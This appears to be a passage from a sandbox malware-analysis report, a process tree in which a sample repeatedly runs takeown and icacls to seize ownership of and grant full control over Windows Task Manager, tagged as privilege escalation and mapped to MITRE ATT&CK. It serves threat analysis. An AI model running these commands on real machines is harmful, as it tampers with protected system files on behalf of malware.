C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2248 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4524
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2484
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4688
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1368 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5036
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3468
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3688
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2212
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1492
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1064
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4724
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1780 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1952 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4768
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:848
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4200
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4052
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3908
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4944
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3960 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2736
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:764
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2668 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3940
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2832
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4588
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1304 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2772 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2972
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1724
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:392 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:4860 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3932 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:220
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2348 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2068
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3912
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3036 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3468
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1876 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2680
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:5112
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4724
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2472
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3312
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4336 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1732
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4768
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:5088 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4364
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4196
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1348 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:4440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1636 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2728 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4644
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2736 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3632 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3600
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3564
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1920 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2580
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4136
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:940
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2248 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:848
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3328 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2784 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1524 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3260
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2132
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3396 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1392 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4028
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1420 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4668
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4864
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3712 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1492
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2156
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:764 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:760
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2668 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2772
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1840
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2340
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4844
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4424 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4052
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2932
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2024
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3896
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4888
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5072
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:3412 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4056
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1748
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3140 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3900 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2820 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3180 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2972
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1764
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5116 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4144
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4092 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2832
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1684
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3248
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4540
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4584
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:224 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2512 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:4200 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4280 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3348
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:696
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1472
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1612 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1304
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2924 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3960
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5036
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4000
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1780
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2264
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4776
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3588 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3708
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1360
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1700
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1816
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3180
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3900
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1920
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3600 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4196
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:208
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3940
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1876
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2156
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3712
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:916 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1748 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1368
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:812
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3608
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4312
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4688
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
